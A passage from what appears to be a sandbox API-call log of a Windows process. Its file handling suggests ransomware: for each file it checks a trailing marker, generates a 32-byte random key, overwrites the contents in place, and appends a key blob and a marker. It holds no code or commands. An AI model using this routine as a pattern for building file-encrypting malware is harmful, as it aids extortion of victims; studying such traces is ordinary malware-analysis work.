RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.136] GetProcessHeap () returned 0x4f10000 [0083.136] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.137] GetProcessHeap () returned 0x4f10000 [0083.137] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.138] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.138] GetProcessHeap () returned 0x4f10000 [0083.139] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.139] GetProcessHeap () returned 0x4f10000 [0083.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.139] GetProcessHeap () returned 0x4f10000 [0083.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.139] GetProcessHeap () returned 0x4f10000 [0083.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.139] GetProcessHeap () returned 0x4f10000 [0083.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.139] GetProcessHeap () returned 0x4f10000 [0083.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.139] SetFilePointerEx (in: hFile=0x900, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.139] WriteFile (in: hFile=0x900, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.139] WriteFile (in: hFile=0x900, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.139] GetProcessHeap () returned 0x4f10000 [0083.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.139] GetProcessHeap () returned 0x4f10000 [0083.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.139] GetProcessHeap () returned 0x4f10000 [0083.139] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.139] CloseHandle (hObject=0x900) returned 1 [0083.140] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 96 [0083.140] SetFilePointerEx (in: hFile=0x904, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.140] ReadFile (in: hFile=0x904, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.140] SetFilePointerEx (in: hFile=0x904, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.140] GetProcessHeap () returned 0x4f10000 [0083.140] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.140] GetProcessHeap () returned 0x4f10000 [0083.140] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.140] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.140] GetProcessHeap () returned 0x4f10000 [0083.140] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.140] ReadFile (in: hFile=0x904, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x85, lpOverlapped=0x0) returned 1 [0083.143] SetFilePointerEx (in: hFile=0x904, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.143] WriteFile (in: hFile=0x904, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x85, lpOverlapped=0x0) returned 1 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.143] GetProcessHeap () returned 0x4f10000 [0083.143] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.144] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.144] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.145] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.145] GetProcessHeap () returned 0x4f10000 [0083.146] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x1f8) returned 0x7cf6bf8 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.146] GetProcessHeap () returned 0x4f10000 [0083.146] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.147] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.147] GetProcessHeap () returned 0x4f10000 [0083.148] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.148] GetProcessHeap () returned 0x4f10000 [0083.148] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.148] GetProcessHeap () returned 0x4f10000 [0083.148] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.148] SetFilePointerEx (in: hFile=0x904, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.148] WriteFile (in: hFile=0x904, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.148] WriteFile (in: hFile=0x904, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.148] GetProcessHeap () returned 0x4f10000 [0083.148] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.148] GetProcessHeap () returned 0x4f10000 [0083.148] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.148] GetProcessHeap () returned 0x4f10000 [0083.148] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.148] CloseHandle (hObject=0x904) returned 1 [0083.149] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 97 [0083.149] SetFilePointerEx (in: hFile=0x908, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.149] ReadFile (in: hFile=0x908, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.149] SetFilePointerEx (in: hFile=0x908, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.149] GetProcessHeap () returned 0x4f10000 [0083.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.149] GetProcessHeap () returned 0x4f10000 [0083.149] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.149] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.150] GetProcessHeap () returned 0x4f10000 [0083.150] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.150] ReadFile (in: hFile=0x908, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, 